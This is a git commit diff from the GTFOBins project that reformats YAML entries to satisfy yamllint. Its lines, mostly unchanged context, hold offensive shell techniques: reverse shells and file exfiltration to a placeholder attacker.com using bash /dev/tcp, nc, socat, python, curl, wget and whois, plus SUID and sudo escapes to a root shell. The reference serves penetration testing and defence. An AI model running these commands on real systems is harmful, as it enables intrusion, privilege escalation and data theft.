Fix YAMLs according to YAMLlint

2024-10-22 16:48:09 +02:00 · 2018-07-16 15:01:50 +02:00 · 2018-07-16 15:01:50 +02:00 · e1cd3aed68
commit e1cd3aed68
parent 785126ede0
87 changed files with 996 additions and 1061 deletions
--- a/.yamllint
+++ b/.yamllint
@ -0,0 +1,3 @@
 extends: default
 rules:
  line-length: disable
--- a/5
+++ b/5
@ -1,4 +1,4 @@
-.PHONY: serve serve-public bundle
+.PHONY: serve serve-public bundle lint
 serve:
 	bundle exec jekyll serve
@ -8,3 +8,6 @@ serve-public:
 bundle:
 	bundle install
 lint:
 	yamllint . _gtfobins/*.md
--- a/_config.yml
+++ b/_config.yml
@ -1,3 +1,4 @@
 ---
 title: GTFOBins
 exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md']
--- a/_data/functions.yml
+++ b/_data/functions.yml
@ -1,3 +1,4 @@
 ---
 execute-interactive:
  label: Interactive execute
  description: |
--- a/_gtfobins/bash.md
+++ b/_gtfobins/bash.md
@ -9,15 +9,13 @@ functions:
        export RPORT=12345
        bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
  upload:
-  - description: Send local file in the body of an HTTP POST request. Run an HTTP
+    - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
      service on the attacker box to collect the file.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        export LFILE=file_to_send
        bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
-  - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
+    - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
      on the attacker box to collect the file.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
@ -32,8 +30,7 @@ functions:
        bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
            3<>/dev/tcp/$RHOST/$RPORT \
            | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
-  - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
+    - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
      on the attacker box to send the file.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
--- a/_gtfobins/busybox.md
+++ b/_gtfobins/busybox.md
@ -1,6 +1,5 @@
 ---
-description: |
+description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
  BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
  what GTFBins binaries are supported. Here some example.
 functions:
  execute-interactive:
@ -19,8 +18,7 @@ functions:
        LFILE=file_to_read
        ./busybox cat "$LFILE"
  suid-enabled:
-  - description: It may drop the SUID privileges depending on the compilation flags
+    - description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
      and the runtime configuration.
      code: "./busybox sh"
  sudo-enabled:
    - code: sudo busybox sh
--- a/_gtfobins/curl.md
+++ b/_gtfobins/curl.md
@ -1,8 +1,7 @@
 ---
 functions:
  upload:
-  - description: Send local file with an HTTP POST request. Run an HTTP service on
+    - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
      the attacker box to collect the file.
      code: |
        URL=http://attacker.com/
        LFILE=file_to_send
--- a/_gtfobins/dash.md
+++ b/_gtfobins/dash.md
@ -7,7 +7,7 @@ functions:
        export LFILE=file_to_write
        ash -c 'echo data > $LFILE'
  suid-enabled:
-  - code: "./dash -p"
+    - code: ./dash -p
  sudo-enabled:
    - code: sudo dash
 ---
--- a/_gtfobins/ed.md
+++ b/_gtfobins/ed.md
@ -9,9 +9,7 @@ functions:
        ed file_to_write
        w
  file-read:
-  - code: 'ed file_to_read
+    - code: ed file_to_read
 '
  sudo-enabled:
    - code: |
        sudo ed
--- a/_gtfobins/emacs.md
+++ b/_gtfobins/emacs.md
@ -7,9 +7,7 @@ functions:
        emacs file_to_write
        C-x C-s
  file-read:
-  - code: 'emacs file_to_read
+    - code: emacs file_to_read
 '
  suid-enabled:
    - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
  sudo-enabled:
--- a/_gtfobins/env.md
+++ b/_gtfobins/env.md
@ -3,7 +3,7 @@ functions:
  execute-interactive:
    - code: env /bin/sh
  suid-enabled:
-  - code: "./env /bin/sh -p"
+    - code: ./env /bin/sh -p
  sudo-enabled:
    - code: sudo env /bin/sh
 ---
--- a/_gtfobins/expand.md
+++ b/_gtfobins/expand.md
@ -1,7 +1,5 @@
 ---
-description: 'The read file content is corrupted by replacing tabs with spaces.
+description: The read file content is corrupted by replacing tabs with spaces.
 '
 functions:
  file-read:
    - code: |
--- a/_gtfobins/expect.md
+++ b/_gtfobins/expect.md
@ -3,7 +3,7 @@ functions:
  execute-interactive:
    - code: expect -c 'spawn /bin/sh;interact'
  suid-enabled:
-  - code: "./expect -c 'spawn /bin/sh -p;interact'"
+    - code: ./expect -c 'spawn /bin/sh -p;interact'
  sudo-enabled:
    - code: sudo expect -c 'spawn /bin/sh;interact'
 ---
--- a/_gtfobins/find.md
+++ b/_gtfobins/find.md
@ -3,7 +3,7 @@ functions:
  execute-interactive:
    - code: find . -exec /bin/sh \; -quit
  suid-enabled:
-  - code: "./find . -exec /bin/sh -p \\; -quit"
+    - code: ./find . -exec /bin/sh -p \; -quit
  sudo-enabled:
    - code: sudo find . -exec /bin/sh \; -quit
 ---
--- a/_gtfobins/flock.md
+++ b/_gtfobins/flock.md
@ -3,7 +3,7 @@ functions:
  execute-interactive:
    - code: flock -u / /bin/sh
  suid-enabled:
-  - code: "./flock -u / /bin/sh -p"
+    - code: ./flock -u / /bin/sh -p
  sudo-enabled:
    - code: sudo flock -u / /bin/sh
 ---
--- a/_gtfobins/fmt.md
+++ b/_gtfobins/fmt.md
@ -1,7 +1,5 @@
 ---
-description: 'The read file content is not binary-safe.
+description: The read file content is not binary-safe.
 '
 functions:
  file-read:
    - code: |
--- a/_gtfobins/ionice.md
+++ b/_gtfobins/ionice.md
@ -3,7 +3,7 @@ functions:
  execute-interactive:
    - code: ionice /bin/sh
  suid-enabled:
-  - code: "./ionice /bin/sh -p"
+    - code: ./ionice /bin/sh -p
  sudo-enabled:
    - code: sudo ionice /bin/sh
 ---
--- a/_gtfobins/ksh.md
+++ b/_gtfobins/ksh.md
@ -9,15 +9,13 @@ functions:
        export RPORT=12345
        ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
  upload:
-  - description: Send local file in the body of an HTTP POST request. Run an HTTP
+    - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
      service on the attacker box to collect the file.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        export LFILE=file_to_send
        ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
-  - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
+    - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
      on the attacker box to collect the file.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
@ -32,8 +30,7 @@ functions:
        ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
            3<>/dev/tcp/$RHOST/$RPORT \
            | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
-  - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
+    - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
      on the attacker box to send the file.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
@ -53,7 +50,7 @@ functions:
        export LFILE=file_to_read
        ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
  suid-enabled:
-  - code: "./ksh -p"
+    - code: ./ksh -p
  sudo-enabled:
    - code: sudo ksh
 ---
--- a/_gtfobins/ld.so.md
+++ b/_gtfobins/ld.so.md
@ -9,9 +9,9 @@ description: |
  ```
 functions:
  execute-interactive:
-  - code: "/lib/ld.so /bin/sh"
+    - code: /lib/ld.so /bin/sh
  suid-enabled:
-  - code: "./ld.so /bin/sh -p"
+    - code: ./ld.so /bin/sh -p
  sudo-enabled:
    - code: sudo /lib/ld.so /bin/sh
 ---
--- a/_gtfobins/less.md
+++ b/_gtfobins/less.md
@ -8,9 +8,7 @@ functions:
        VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
        v
  file-read:
-  - code: 'less file_to_read
+    - code: less file_to_read
 '
  sudo-enabled:
    - code: |
        sudo less /etc/profile
--- a/_gtfobins/make.md
+++ b/_gtfobins/make.md
@ -1,8 +1,5 @@
 ---
-description: |
+description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`.
  All these examples only work with GNU `make` due to the lack of support of the
  `--eval` flag. The same can be achieved by using a proper `Makefile` or by
  passing the content via stdin using `-f -`.
 functions:
  execute-interactive:
    - code: |
--- a/_gtfobins/man.md
+++ b/_gtfobins/man.md
@ -5,9 +5,7 @@ functions:
        man man
        !/bin/sh
  file-read:
-  - code: 'man file_to_read
+    - code: man file_to_read
 '
  sudo-enabled:
    - code: |
        sudo man man
--- a/_gtfobins/more.md
+++ b/_gtfobins/more.md
@ -5,9 +5,7 @@ functions:
        TERM= more /etc/profile
        !/bin/sh
  file-read:
-  - code: 'more file_to_read
+    - code: more file_to_read
 '
  suid-enabled:
    - code: "./more file_to_read\n"
  sudo-enabled:
--- a/_gtfobins/nano.md
+++ b/_gtfobins/nano.md
@ -14,9 +14,7 @@ functions:
        nano file_to_write
        ^O
  file-read:
-  - code: 'nano file_to_read
+    - code: nano file_to_read
 '
  suid-enabled:
    - description: After running this exit the editor to see the command output.
      code: |
--- a/_gtfobins/nc.md
+++ b/_gtfobins/nc.md
@ -12,16 +12,14 @@ functions:
        LPORT=12345
        nc -l -p $LPORT -e /bin/sh
  upload:
-  - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"`
+    - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
      on the attacker box to collect the file.
      code: |
        RHOST=attacker.com
        RPORT=12345
        LFILE=file_to_send
        nc $RHOST $RPORT < "$LFILE"
  download:
-  - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345
+    - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
      < "file_to_send"` on the attacker box to send the file.
      code: |
        LPORT=12345
        LFILE=file_to_save
--- a/_gtfobins/nl.md
+++ b/_gtfobins/nl.md
@ -1,8 +1,5 @@
 ---
-description: 'The read file content is corrupted by a leading space added to each
+description: The read file content is corrupted by a leading space added to each line.
  line.
 '
 functions:
  file-read:
    - code: |
--- a/_gtfobins/node.md
+++ b/_gtfobins/node.md
@ -1,9 +1,8 @@
 ---
 functions:
  execute-interactive:
-  - code: 'node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});''
+    - code: |
-
+        node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
 '
  reverse-shell-interactive:
    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
      code: |
@ -26,13 +25,9 @@ functions:
          sh.stderr.pipe(client);
        }).listen(process.env.LPORT);'
  suid-enabled:
-  - code: './node -e ''require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0,
+    - code: |
-      1, 2]});''
+        ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
 '
  sudo-enabled:
-  - code: 'sudo node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1,
+    - code: |
-      2]});''
+        sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
 '
 ---
--- a/_gtfobins/od.md
+++ b/_gtfobins/od.md
@ -1,7 +1,5 @@
 ---
-description: |
+description: Three spaces are added before each character in the read file, and non-printable chars are printed as backslash escape sequences.
  Three spaces are added before each character in the read file, and
  non-printable chars are printed as backslash escape sequences.
 functions:
  file-read:
    - code: |
--- a/_gtfobins/php.md
+++ b/_gtfobins/php.md
@ -27,8 +27,7 @@ functions:
        export RPORT=12345
        php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
  upload:
-  - description: Serve files in the local folder running an HTTP server. This requires
+    - description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
      PHP version 5.4 or later.
      code: |
        LHOST=0.0.0.0
        LPORT=8888
--- a/_gtfobins/pico.md
+++ b/_gtfobins/pico.md
@ -14,9 +14,7 @@ functions:
        pico file_to_write
        ^O
  file-read:
-  - code: 'pico file_to_read
+    - code: pico file_to_read
 '
  suid-enabled:
    - description: After running this exit the editor to see the command output.
      code: |
--- a/_gtfobins/puppet.md
+++ b/_gtfobins/puppet.md
@ -11,8 +11,7 @@ functions:
        export LFILE="/tmp/file_to_write"
        puppet apply -e "file { '$LFILE': content => 'data' }"
  file-read:
-  - description: The read file content is corrupted by the `diff` output format. The
+    - description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
      actual `/usr/bin/diff` command is executed.
      code: |
        export LFILE=file_to_read
        puppet filebucket -l diff /dev/null $LFILE
--- a/_gtfobins/python2.md
+++ b/_gtfobins/python2.md
@ -3,15 +3,13 @@ functions:
  execute-interactive:
    - code: python2 -c 'import os; os.system("/bin/sh")'
  reverse-shell-interactive:
-  - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on
+    - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
      the attacker box to receive the shell.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
  upload:
-  - description: Send local file via "d" parameter of a HTTP POST request. Run an
+    - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
      HTTP service on the attacker box to collect the file.
      code: |
        export URL=http://attacker.com/
        export LFILE=file_to_send
--- a/_gtfobins/python3.md
+++ b/_gtfobins/python3.md
@ -3,15 +3,13 @@ functions:
  execute-interactive:
    - code: python3 -c 'import os; os.system("/bin/sh")'
  reverse-shell-interactive:
-  - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on
+    - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
      the attacker box to receive the shell.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
  upload:
-  - description: Send local file via "d" parameter of a HTTP POST request. Run an
+    - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
      HTTP service on the attacker box to collect the file.
      code: |
        export URL=http://attacker.com/
        export LFILE=file_to_send
--- a/_gtfobins/rlwrap.md
+++ b/_gtfobins/rlwrap.md
@ -3,13 +3,12 @@ functions:
  execute-interactive:
    - code: rlwrap /bin/sh
  file-write:
-  - description: This adds timestamps to the output file. This relies on the external
+    - description: This adds timestamps to the output file. This relies on the external `echo` command.
      `echo` command.
      code: |
        LFILE=file_to_write
        rlwrap -l "$LFILE" echo data
  suid-enabled:
-  - code: "./rlwrap -H /dev/null /bin/sh -p"
+    - code: ./rlwrap -H /dev/null /bin/sh -p
  sudo-enabled:
    - code: sudo rlwrap /bin/sh
 ---
--- a/_gtfobins/ruby.md
+++ b/_gtfobins/ruby.md
@ -9,8 +9,7 @@ functions:
        export RPORT=12345
        ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
  upload:
-  - description: Serve files in the local folder running an HTTP server. This requires
+    - description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
      version 1.9.2 or later.
      code: |
        export LPORT=8888
        ruby -run -e httpd . -p $LPORT
--- a/_gtfobins/setarch.md
+++ b/_gtfobins/setarch.md
@ -3,7 +3,7 @@ functions:
  execute-interactive:
    - code: setarch $(arch) /bin/sh
  suid-enabled:
-  - code: "./setarch $(arch) /bin/sh -p"
+    - code: ./setarch $(arch) /bin/sh -p
  sudo-enabled:
    - code: sudo setarch $(arch) /bin/sh
 ---
--- a/_gtfobins/socat.md
+++ b/_gtfobins/socat.md
@ -1,15 +1,13 @@
 ---
 functions:
  reverse-shell-interactive:
-  - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on
+    - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
      the attacker box to receive the shell.
      code: |
        RHOST=attacker.com
        RPORT=12345
        socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
  bind-shell-interactive:
-  - description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code>
+    - description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
      on the attacker box to connect to the shell.
      code: |
        LPORT=12345
        socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
--- a/_gtfobins/ssh.md
+++ b/_gtfobins/ssh.md
@ -4,8 +4,7 @@ functions:
    - description: Reconnecting may help bypassing restricted shells.
      code: ssh localhost $SHELL --noprofile --norc
    - description: Spawn interactive shell through ProxyCommand option.
-    code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'"
+      code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
      x
  upload:
    - description: Send local file to a SSH server.
      code: |
@ -27,6 +26,5 @@ functions:
        ssh -F $LFILE localhost
  sudo-enabled:
    - description: Spawn interactive root shell through ProxyCommand option.
-    code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh
+      code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
      -i'" x
 ---
--- a/_gtfobins/stdbuf.md
+++ b/_gtfobins/stdbuf.md
@ -3,7 +3,7 @@ functions:
  execute-interactive:
    - code: stdbuf -i0 /bin/sh
  suid-enabled:
-  - code: "./stdbuf -i0 /bin/sh -p"
+    - code: ./stdbuf -i0 /bin/sh -p
  sudo-enabled:
    - code: sudo stdbuf -i0 /bin/sh
 ---
--- a/_gtfobins/strace.md
+++ b/_gtfobins/strace.md
@ -3,7 +3,7 @@ functions:
  execute-interactive:
    - code: strace -o /dev/null /bin/sh
  suid-enabled:
-  - code: "./strace -o /dev/null /bin/sh -p"
+    - code: ./strace -o /dev/null /bin/sh -p
  sudo-enabled:
    - code: sudo strace -o /dev/null /bin/sh
 ---
--- a/_gtfobins/tar.md
+++ b/_gtfobins/tar.md
@ -20,5 +20,5 @@ functions:
  sudo-enabled:
    - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
  suid-limited:
-  - code: "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
+    - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
 ---
--- a/_gtfobins/taskset.md
+++ b/_gtfobins/taskset.md
@ -3,7 +3,7 @@ functions:
  execute-interactive:
    - code: taskset 1 /bin/sh
  suid-enabled:
-  - code: "./taskset 1 /bin/sh -p"
+    - code: ./taskset 1 /bin/sh -p
  sudo-enabled:
    - code: sudo taskset 1 /bin/sh
 ---
--- a/_gtfobins/tee.md
+++ b/_gtfobins/tee.md
@ -1,7 +1,5 @@
 ---
-description: 'It can only append data if the destination exists.
+description: It can only append data if the destination exists.
 '
 functions:
  file-write:
    - code: |
--- a/_gtfobins/time.md
+++ b/_gtfobins/time.md
@ -1,12 +1,10 @@
 ---
-description: |
+description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
  Note that the shell might have its own builtin time implementation, which may
  behave differently than` /usr/bin/time`, hence the absolute path.
 functions:
  execute-interactive:
-  - code: "/usr/bin/time /bin/sh"
+    - code: /usr/bin/time /bin/sh
  suid-enabled:
-  - code: "./time /bin/sh -p"
+    - code: ./time /bin/sh -p
  sudo-enabled:
    - code: sudo /usr/bin/time /bin/sh
 ---
--- a/_gtfobins/timeout.md
+++ b/_gtfobins/timeout.md
@ -3,7 +3,7 @@ functions:
  execute-interactive:
    - code: timeout 7d /bin/sh
  suid-enabled:
-  - code: "./timeout 7d /bin/sh -p"
+    - code: ./timeout 7d /bin/sh -p
  sudo-enabled:
    - code: sudo timeout --foreground 7d /bin/sh
 ---
--- a/_gtfobins/ul.md
+++ b/_gtfobins/ul.md
@ -1,7 +1,5 @@
 ---
-description: |
+description: The read file content is corrupted by replacing occurrences of `$'\b_'` to terminal sequences and by converting tabs to spaces.
  The read file content is corrupted by replacing occurrences of `$'\b_'` to
  terminal sequences and by converting tabs to spaces.
 functions:
  file-read:
    - code: |
--- a/_gtfobins/uniq.md
+++ b/_gtfobins/uniq.md
@ -1,7 +1,5 @@
 ---
-description: 'The read file content is corrupted by squashing multiple adjacent lines.
+description: The read file content is corrupted by squashing multiple adjacent lines.
 '
 functions:
  file-read:
    - code: |
--- a/_gtfobins/unshare.md
+++ b/_gtfobins/unshare.md
@ -3,7 +3,7 @@ functions:
  execute-interactive:
    - code: unshare /bin/sh
  suid-enabled:
-  - code: "./unshare -r /bin/sh"
+    - code: ./unshare -r /bin/sh
  sudo-enabled:
    - code: sudo unshare /bin/sh
 ---
--- a/_gtfobins/vi.md
+++ b/_gtfobins/vi.md
@ -11,11 +11,9 @@ functions:
        vi file_to_write
        w
  file-read:
-  - code: 'vi file_to_read
+    - code: vi file_to_read
 '
  suid-enabled:
-  - code: "./vi -c ':!/bin/sh -p'"
+    - code: ./vi -c ':!/bin/sh -p'
  sudo-enabled:
    - code: sudo vi -c ':!/bin/sh'
 ---
--- a/_gtfobins/watch.md
+++ b/_gtfobins/watch.md
@ -4,9 +4,9 @@ functions:
    - code: watch /usr/bin/id
  suid-enabled:
    - description: This keeps the SUID privileges only if the `-x` option is present.
-    code: "./watch -x /usr/bin/id"
+      code: ./watch -x /usr/bin/id
  sudo-enabled:
    - code: sudo watch /usr/bin/id
  suid-limited:
-  - code: "./watch /usr/bin/id"
+    - code: ./watch /usr/bin/id
 ---
--- a/_gtfobins/wget.md
+++ b/_gtfobins/wget.md
@ -1,8 +1,7 @@
 ---
 functions:
  upload:
-  - description: Send base64-encoded local file via "d" parameter of a HTTP POST request.
+    - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
      Run an HTTP service on the attacker box to collect the file.
      code: |
        export URL=http://attacker.com/
        export LFILE=file_to_send
--- a/_gtfobins/whois.md
+++ b/_gtfobins/whois.md
@ -1,34 +1,28 @@
 ---
-description: "`whois` hangs waiting for the remote peer to close the socket.\n"
+description: |
  `whois` hangs waiting for the remote peer to close the socket.
 functions:
  upload:
-  - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"`
+    - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
      on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'`
      and its length is limited by the maximum size of arguments.
      code: |
        RHOST=attacker.com
        RPORT=12345
        LFILE=file_to_send
        whois -h $RHOST -p $RPORT "`cat $LFILE`"
-  - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d'
+    - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
      | base64 -d > "file_to_save"` on the attacker box to collect the file. The file
      length is limited by the maximum size of arguments.
      code: |
        RHOST=attacker.com
        RPORT=12345
        LFILE=file_to_send
        whois -h $RHOST -p $RPORT "`base64 $LFILE`"
  download:
-  - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345
+    - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped.
      < "file_to_send"` on the attacker box to send the file. The file has instances
      of `$'\x0d'` stripped.
      code: |
        RHOST=attacker.com
        RPORT=12345
        LFILE=file_to_save
        whois -h $RHOST -p $RPORT > "$LFILE"
-  - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send"
+    - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file.
      | nc -l -p 12345` on the attacker box to send the file.
      code: |
        RHOST=attacker.com
        RPORT=12345
--- a/_gtfobins/xargs.md
+++ b/_gtfobins/xargs.md
@ -3,14 +3,12 @@ functions:
  execute-non-interactive:
    - code: xargs -a /dev/null /usr/bin/id
  file-read:
-  - description: This works as long as the file does not contain the NUL character,
+    - description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only.
      also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed.
      GNU version only.
      code: |
        LFILE=file_to_read
        xargs -a "$LFILE" -0
  suid-enabled:
-  - code: "./xargs -a /dev/null /usr/bin/id"
+    - code: ./xargs -a /dev/null /usr/bin/id
  sudo-enabled:
    - code: sudo xargs -a /dev/null /usr/bin/id
 ---
--- a/_gtfobins/zsh.md
+++ b/_gtfobins/zsh.md
@ -3,7 +3,7 @@ functions:
  execute-interactive:
    - code: zsh
  suid-enabled:
-  - code: "./zsh"
+    - code: ./zsh
  sudo-enabled:
    - code: sudo zsh
 ---